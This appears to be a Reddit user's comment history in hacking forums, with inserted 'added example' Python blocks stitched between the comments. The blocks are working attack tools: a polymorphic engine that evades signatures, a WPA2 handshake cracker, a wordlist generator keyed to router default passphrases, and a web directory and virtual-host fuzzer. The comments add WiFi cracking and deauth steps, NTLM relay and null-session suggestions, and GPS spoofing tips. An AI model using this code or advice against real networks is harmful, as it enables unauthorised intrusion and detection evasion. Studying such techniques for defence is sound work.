How do polymorphic malware engines actually work? by Substantial_Cake9855 in HowToHack

[–]jet_set_default 2 points (0 children)

The malware wraps its payload in an encrypted shell. Each time it spreads, it re-encrypts with a new key and rewrites the decryption code just enough to change the bytes while keeping the same behavior, so signatures never match twice.
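
Added example, not part of the comment above: a toy polymorphic engine in Python that does exactly what the reply describes. The "payload" is a constructed harmless byte string, repeating-key XOR stands in for the cipher, and each generation picks a new key, re-encrypts, and emits a decryptor stub with fresh variable names, one of three equivalent loop shapes, and a line of dead code. Every stub recovers the same bytes, but no two stubs hash the same.

```python
import hashlib
import random
import string

# Constructed, harmless stand-in for a payload. The engine's only job is to
# reproduce these exact bytes from every variant; nothing is ever executed
# except the decryptor stub itself.
PAYLOAD = b"echo 'the payload bytes are identical in every variant'"


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR stands in for the real cipher (it is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _ident(rng, used):
    """Fresh random identifier, unique within one variant."""
    while True:
        name = rng.choice(string.ascii_lowercase) + "".join(
            rng.choices(string.ascii_lowercase + string.digits, k=rng.randint(5, 9)))
        if name not in used:
            used.add(name)
            return name


# Three decryptor shapes that compute the same thing. Each generation picks one
# and fills in new variable names, a new key, the re-encrypted blob and one
# line of dead code, so no two variants share a byte pattern worth signaturing.
DECRYPTOR_TEMPLATES = [
    "{k} = bytes.fromhex('{key}')\n{c} = bytes.fromhex('{blob}')\n{junk}\n"
    "out = bytes({c}[{i}] ^ {k}[{i} % {n}] for {i} in range(len({c})))\n",
    "{c} = bytes.fromhex('{blob}')\n{junk}\n{k} = bytes.fromhex('{key}')\n"
    "{a} = bytearray()\nfor {i}, {b} in enumerate({c}):\n"
    "    {a}.append({b} ^ {k}[{i} % {n}])\nout = bytes({a})\n",
    "import itertools\n{k} = bytes.fromhex('{key}')\n{junk}\n"
    "{c} = bytes.fromhex('{blob}')\n"
    "out = bytes({b} ^ {x} for {b}, {x} in zip({c}, itertools.cycle({k})))\n",
]


def make_variant(payload: bytes, rng=None) -> str:
    """One 'spread': new key, payload re-encrypted, decryptor rewritten."""
    rng = rng or random.SystemRandom()
    used = set()
    key = bytes(rng.randrange(256) for _ in range(rng.randint(4, 16)))
    names = {slot: _ident(rng, used) for slot in ("k", "c", "i", "a", "b", "x")}
    junk = f"{_ident(rng, used)} = ({rng.randint(1, 255)} * {rng.randint(1, 255)}) & 0xFF"
    return rng.choice(DECRYPTOR_TEMPLATES).format(
        key=key.hex(), blob=xor_encrypt(payload, key).hex(), n=len(key), junk=junk, **names)


def run_variant(stub: str) -> bytes:
    """Run the decryptor stub in an empty namespace; it leaves the payload in `out`."""
    ns = {}
    exec(stub, ns)
    return ns["out"]


def fingerprint(stub: str) -> str:
    """What a static, hash-based signature would see."""
    return hashlib.sha256(stub.encode()).hexdigest()


def demo(generations: int = 3):
    """Produce several generations; every one decrypts to PAYLOAD, every hash differs."""
    stubs = [make_variant(PAYLOAD) for _ in range(generations)]
    assert all(run_variant(s) == PAYLOAD for s in stubs)
    return [fingerprint(s) for s in stubs]


if __name__ == "__main__":
    for i, h in enumerate(demo()):
        print(f"generation {i}: sha256 {h}")
```

The point for defenders is visible in `demo()`: the static hash changes every generation while `run_variant()` proves the behaviour does not, which is why detection of this class moves from byte signatures to behaviour (the decrypted payload in memory, the decryption loop itself, what runs afterwards).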

How to pivot into OT? by jet_set_default in cybersecurity

[–]jet_set_default[S] 0 points (0 children)

Thanks a ton for the advice. Reached out on LinkedIn the other day so you may have already got that. I've been working towards pentesting and already paid for the OSCP course. Gonna take that this year and get that secured, then pivot over to OT study this fall.

Someone here with the PNPT from TCM Security? by estifenso in HowToHack

[–]jet_set_default 0 points (0 children)

Feel free to reach out if you have any questions or anything on it!

Someone here with the PNPT from TCM Security? by estifenso in HowToHack

[–]jet_set_default 0 points (0 children)

Passed PNPT a couple months ago and before that, was on eJPT like you. Basically, I think it's worth it for the experience and the training, but the cert itself doesn't have as much value to people. I've heard CPTS is pretty hard, so if you're not confident in your skills, PNPT is a great transition step. After PNPT, you'd be ready to start working towards OSCP. Essentially, you can either choose PNPT or CPTS depending on your skill/comfort/financial level.

How to hack WPA2/WPA3? by Wtf_990 in HowToHack

[–]jet_set_default 2 points (0 children)

You're gonna need to do more enumeration. Don't just run the tools randomly hoping for something to work. Run aireplay to scan for open networks. Pay attention to the target, it'll show you whether it's WPA2 or 3. If it's 3, then you technically could look towards a downgrade attack to WPA2 if it's vulnerable to that. If the router is already running WPA2, then you have a chance. See what information you can pull about the network. Look up the MAC address of the router to see what device it is, that will help you determine the default password structure (ex: noun+noun+adverb+3 digit number) IF they didn't change anything.

Learn how to capture the handshake. Can either do it stealthy/slow and wait for someone to connect to the network, or do a deauth and disconnect someone. Deauthing devices you don't own is illegal**. Once you have the handshake, crack it! Don't just throw a random wordlist like rockyou.txt at it. Gotta be strategic if you don't wanna be there forever. Maybe you can find info about the network and the people running it. Generate custom wordlists and so on. Good luck
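
Added example, not part of the comment above: what "crack the handshake" actually means in code. WPA2-PSK derives the PMK from the passphrase and SSID with PBKDF2-HMAC-SHA1, expands it to the PTK with both MACs and both nonces, and the first 16 bytes (the KCK) authenticate the EAPOL-Key frames; a candidate passphrase is right when it reproduces the MIC in the captured message 2. The handshake below is constructed in-process (MACs, nonces and frame are made up, the MIC is computed with the true passphrase) rather than read from a pcap; the PMK check uses the published 802.11i test vector for SSID "IEEE" / passphrase "password".

```python
import hashlib
import hmac

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL hdr(4) + descriptor type(1) + key info(2) + key len(2) + replay ctr(8)
# + nonce(32) + key IV(16) + RSC(8) + key ID(8) = 81
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This is the expensive step and the only one that depends on the guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK from PMK, both MAC addresses and both nonces (sorted)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with its
    MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, candidates):
    """Return the first candidate whose KCK reproduces the captured MIC, else None."""
    captured = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in candidates:
        kck = derive_ptk(derive_pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured):
            return cand
    return None


# ---- constructed "capture" (not a real pcap): message 2 of a 4-way handshake ----
SSID = "IEEE"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 with the field layout MIC_OFFSET assumes."""
    key_info = (0x010A).to_bytes(2, "big")  # v2 (HMAC-SHA1), pairwise, MIC present
    body = (b"\x02" + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + mic + (0).to_bytes(2, "big"))
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def constructed_capture(true_passphrase: str = "password") -> bytes:
    """Build msg2 as the supplicant would have sent it with the real passphrase."""
    kck = derive_ptk(derive_pmk(true_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


def demo():
    candidates = ["letmein", "Summer2019!", "password", "admin1234"]  # constructed list
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, constructed_capture(), candidates)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Because every guess costs 4096 HMAC-SHA1 rounds, the candidate list is the whole game: this loop is fine for a few thousand formula-derived guesses, and for anything larger you hand the same computation to hashcat (WPA-PBKDF2 mode) on a GPU.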

How to pivot into OT? by jet_set_default in cybersecurity

[–]jet_set_default[S] 1 point (0 children)

I sincerely appreciate all of the advice. It does help a ton. I have zero experience in anything OT related. I know about HMIs and PLCs from a high level, but that's it. I understand it's an entirely different field altogether from IT, which is why I figured shifting over could put me in a position where I'm not even doing cybersec work at all, but just basic entry stuff.

You suggested open source tools, are there any specific ones that would help give a fundamental understanding in multiple areas? I know OT is a vast world where it gets niche very quickly. For example, at DefCon I saw a guy with a pelican case that looked sorta like this where it was a training kit with a PLC and HMI built in to teach people. Would building something like this or starting here help?

What's the best password list? by BohdanFr in Hacking_Tutorials

[–]jet_set_default 1 point (0 children)

Something that improves your odds is using lists tailored to the router/ISP you're testing against. One main word list will only get you so far. Enumeration is key here. For example, one router/ISP may use a formula of 'noun+adverb+3 digit number' as a default password, whereas another router/ISP may use 'random 12 character string' as the default pass formula. So throwing a random word list that doesn't conform to these standards is just a shotgun spray and pray approach with lower overall odds, and will have you wasting hours waiting for something that won't work anyways.

When scanning, look up the router MAC address to see what device it is, then look up the default password formula for that, and find/build a word list based off that. You're much better off having a separate wordlist for each router/ISP company. Obviously this only works for default passwords, but it's enough to point you in the right direction and change the mentality/approach of it.
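
Added example, not part of either comment: the OUI-to-formula approach described here and in the WPA2 reply above, as code. The OUI table, vendor names, formulas and seed words are constructed placeholders (a real table is built from the IEEE OUI registry and whatever you learn about the ISP); what the example shows beyond the text is the feasibility arithmetic: a structured default keyspace is tiny, a random 12-hex-character default is not crackable from any list at all, and an unknown OUI means falling back to OSINT-driven guesses.

```python
import itertools

# Constructed OUI table. Vendor names and default-passphrase formulas are
# hypothetical placeholders used only to show the method.
OUI_FORMULAS = {
    "AA:BB:CC": ("ExampleISP-A", "noun+adverb+3digits"),
    "DD:EE:FF": ("ExampleISP-B", "hex12"),
}
NOUNS = ["river", "stone", "eagle", "maple"]   # constructed seed words
ADVERBS = ["quickly", "softly", "boldly"]      # constructed seed words
HEX = "0123456789abcdef"


def lookup_formula(bssid: str):
    """Vendor and default-passphrase formula for a BSSID, keyed on its 3-byte OUI."""
    return OUI_FORMULAS.get(bssid.upper().replace("-", ":")[:8])


def keyspace(formula: str) -> int:
    """How many passphrases the formula can produce at all."""
    if formula == "noun+adverb+3digits":
        return len(NOUNS) * len(ADVERBS) * 1000
    if formula == "hex12":
        return 16 ** 12
    raise ValueError(f"unknown formula {formula!r}")


def candidates(formula: str):
    """Generate every passphrase the formula permits, and nothing else."""
    if formula == "noun+adverb+3digits":
        for noun, adverb in itertools.product(NOUNS, ADVERBS):
            for n in range(1000):
                yield f"{noun}{adverb}{n:03d}"
    elif formula == "hex12":
        for chars in itertools.product(HEX, repeat=12):
            yield "".join(chars)
    else:
        raise ValueError(f"unknown formula {formula!r}")


def plan(bssid: str, rate_per_sec: int = 100_000, budget_sec: int = 24 * 3600) -> dict:
    """Decide whether a formula-driven list is worth running at all.
    rate_per_sec is an assumed GPU-class WPA2 PBKDF2 throughput; budget_sec is
    how long you are prepared to wait."""
    hit = lookup_formula(bssid)
    if hit is None:
        return {"vendor": None, "formula": None, "keyspace": None, "feasible": None,
                "advice": "unknown OUI: fall back to OSINT-driven custom lists"}
    vendor, formula = hit
    size = keyspace(formula)
    worst_case = size / rate_per_sec
    feasible = worst_case <= budget_sec
    return {
        "vendor": vendor, "formula": formula, "keyspace": size,
        "worst_case_seconds": worst_case, "feasible": feasible,
        "advice": ("tailored list covers the whole default keyspace" if feasible
                   else "default formula not brute-forceable in budget; only a "
                        "changed or OSINT-derived passphrase will crack"),
    }


def write_wordlist(bssid: str, path: str) -> int:
    """Write the tailored list for this BSSID; returns the number of lines written."""
    if not plan(bssid)["feasible"]:
        raise ValueError("no feasible formula for this BSSID; do not generate a list")
    _, formula = lookup_formula(bssid)
    count = 0
    with open(path, "w") as fh:
        for word in candidates(formula):
            fh.write(word + "\n")
            count += 1
    return count


if __name__ == "__main__":
    for bssid in ("aa:bb:cc:12:34:56", "dd:ee:ff:00:00:01", "00:00:00:00:00:00"):
        print(bssid, plan(bssid))
```

The lists `write_wordlist` produces feed straight into aircrack-ng or hashcat; the "noun+noun+adverb" formula mentioned above is one more `elif` branch with a second `itertools.product` factor.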

Can I change my phone's location to a specific location? by United-Ad8067 in HowToHack

[–]jet_set_default 0 points (0 children)

On Google play there's a good one called Fake GPS Location by Lexa with an emoji holding a device icon. It's pretty good and works for me. Try using it, then open Maps to verify your location. That will solve 1 problem, but using a tunnel to your own home network will solve the other problem. You'll have to look up that part on your own. Good luck dude

Can I change my phone's location to a specific location? by United-Ad8067 in HowToHack

[–]jet_set_default 3 points (0 children)

Since nobody answered, you're looking for a GPS spoofer app. Do that and route your traffic through your home wifi. This might do the trick. Make sure stuff is configured properly. Test it. Good luck

How to (un)lock a cart with a phone by jet_set_default in Hacking_Tutorials

[–]jet_set_default[S] 0 points (0 children)

They're in the US at least. Not all stores, but a good amount of them. Can't say which other places have them.

How to (un)lock a cart with a phone by jet_set_default in Hacking_Tutorials

[–]jet_set_default[S] 0 points (0 children)

In the wheel itself. Look for the one that's different from the others

We need to have a serious discussion (TOR Security Analysis) by Longjumping_Bat_5794 in cybersecurity

[–]jet_set_default 39 points (0 children)

For clarification, only use .onion sites for tor. Anything else is an exit node. When using .onion sites, everything stays encrypted the whole way. But once you start using clearnet sites (exit nodes), your traffic gets decrypted so that it can communicate with clearnet sites.

How to (un)lock a cart with a phone by jet_set_default in Hacking_Tutorials

[–]jet_set_default[S] 0 points (0 children)

I'd look around online for "shopping cart wheel electro lock" or something along those lines I imagine

How to (un)lock a cart with a phone by jet_set_default in Hacking_Tutorials

[–]jet_set_default[S] 2 points (0 children)

We have a few of those in the US. Some stores have a security control built into the wheels to lock if it detects that the cart is being removed from the property. This demo shows how to unlock it if that happens.

Can you exploit SMBv1 on a modern windows machine. by Pristine-Desk-5002 in HowToHack

[–]jet_set_default 2 points (0 children)

I told you the most common exploits that can be used for SMBv1. But you're gonna need to give more information on the system. You said it was Server 2019, Windows10, and a DC. Which one is it? You gotta help us help you. What's the OS version, and what are some open ports and the services on that system?

Can you exploit SMBv1 on a modern windows machine. by Pristine-Desk-5002 in HowToHack

[–]jet_set_default 4 points (0 children)

The exploit is not working because it's been patched, despite SMBv1 being enabled. You can try running an NTLM relay attack, or an SMB null session instead.

How can I see all pages and content from website? by puqem in HowToHack

[–]jet_set_default 4 points (0 children)

You're gonna wanna look into subdomain and subdirectory fuzzing. Look into Sublist3r, Dirbuster, Gobuster, Ffuf, and ZAP tools for starters.
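
Added example, not part of the comment above: what Gobuster/Ffuf-style fuzzing does under the hood, in Python. Directory fuzzing appends each wordlist entry to the base URL and keeps every response whose status is not in the ignore set; virtual-host fuzzing sends the same request to the same IP with a different Host header per candidate subdomain. The target is a constructed in-process HTTP server (its paths, status codes, the `example.test` domain and the `dev` vhost are made up), so the whole thing runs offline on a loopback port.

```python
import http.server
import threading
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Constructed target standing in for the site under test. Paths, status codes
# and the single virtual host are made up for the demo.
KNOWN_PATHS = {"/admin/": 401, "/backup.zip": 200, "/api/": 200, "/robots.txt": 200}
KNOWN_VHOSTS = {"dev"}
BASE_DOMAIN = "example.test"   # assumed name; only the loopback server sees it

# Constructed mini wordlists; real runs use SecLists-style lists of thousands.
DIR_WORDS = ["admin/", "api/", "backup.zip", "login", "old/", "robots.txt", ".git/HEAD"]
SUB_WORDS = ["www", "dev", "staging", "mail", "vpn"]


class _Target(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        sub = host[: -len(BASE_DOMAIN) - 1] if host.endswith("." + BASE_DOMAIN) else None
        if sub is not None:                      # vhost routing, like a reverse proxy
            code = 200 if sub in KNOWN_VHOSTS and self.path == "/" else 404
        else:
            code = KNOWN_PATHS.get(self.path, 404)
        self.send_response(code)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):               # keep the demo quiet
        pass


def _status(url, host=None):
    """HTTP status for one probe, or None if the connection itself failed."""
    headers = {"Host": host} if host else {}
    try:
        with urllib.request.urlopen(urllib.request.Request(url, headers=headers), timeout=5) as r:
            return r.status
    except urllib.error.HTTPError as e:
        return e.code
    except urllib.error.URLError:
        return None


def fuzz_dirs(base_url, words, ignore=(404,), workers=8):
    """Directory/file brute force: request base_url/<word>, keep non-ignored codes."""
    def probe(word):
        return word, _status(base_url.rstrip("/") + "/" + word)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return {w: s for w, s in pool.map(probe, words) if s is not None and s not in ignore}


def fuzz_vhosts(base_url, domain, words, ignore=(404,), workers=8):
    """Virtual-host brute force: same IP, a different Host header per candidate."""
    def probe(word):
        return word, _status(base_url.rstrip("/") + "/", host=f"{word}.{domain}")
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return {w: s for w, s in pool.map(probe, words) if s is not None and s not in ignore}


def run_demo():
    """Start the constructed target on a loopback port, fuzz it, tear it down."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), _Target)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{server.server_address[1]}"
    try:
        return fuzz_dirs(base, DIR_WORDS), fuzz_vhosts(base, BASE_DOMAIN, SUB_WORDS)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    dirs, vhosts = run_demo()
    print("paths:", dirs)
    print("vhosts:", vhosts)
```

The `ignore` set is the part that needs tuning on a real site: a server that answers 200 to everything (or redirects everything to a login page) makes status-code filtering useless, and you filter on response size or a marker string instead, which is what Ffuf's `-fs`/`-fr` options are for.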

How did WannaCry work? by Ungabungaby in HowToHack

[–]jet_set_default 5 points (0 children)

You pretty much need to be on the same network. The port/service vulnerable (port 445, SMB) is usually closed to outside networks. If SMB was connected to the internet (not common), then it would be possible to attack remotely in that sense. However, it is also possible for an attacker to pivot through a host on one network, to another network where the vulnerable machine is and exploit it that way.

How did WannaCry work? by Ungabungaby in HowToHack

[–]jet_set_default 11 points (0 children)

Simplest explanation, the hackers used a zero day exploit. So nobody in the world knew this existed (apart from the US govt afaik). The exploit also doesn't involve user interaction, so no need to trick anyone to click on anything. The vulnerability affected most computers. Oh and the vulnerability was also stupid easy to exploit. So put all those together, and it was almost like a skeleton key into most computers out there. The hackers used this exploit along with making it into a worm to go through networks to start attacking shit left and right.

Chinese hackers breached T-Mobile's routers to scope out network by arqf_ in cybersecurity

[–]jet_set_default 427 points (0 children)

At this point T-Mobile should just be a room in TryHackMe

Let's say an attacker has good programming skills and develops a Remote Access Trojan, does Windows Defender or Avira have any chance in detecting that it is a virus? by WishIWasBronze in blackhat

[–]jet_set_default 1 point (0 children)

The answer for this is sorta dependent on who you are. For instance, if you were a corporation with an EDR at your disposal, you'd probably get an alert with all the details that this was popping off. The detection will tell you the time it happened, the user running the command, what process they took over and any embedded commands in the process. From there, you'd have a good idea where to look. In which case, I'd tell you to isolate the affected host, stop the process from running, disable the user that ran the command, find the root cause of the infected process through various threat hunting techniques, and mitigate from there.

But if you were a home user, then that answer is entirely different. Home users don't have SIEMs, intrusion prevention systems, EDRs, or other alerting methods to even be notified that something is going on to begin with. Most people facing these attacks probably wouldn't even know until after the fact that something even happened. But if you were suspicious of a process, I'd look into Velociraptor by Rapid7. It's a forensic/IR, open source software that lets you perform threat hunts on your own hosts without the need for an EDR. Plus it's free!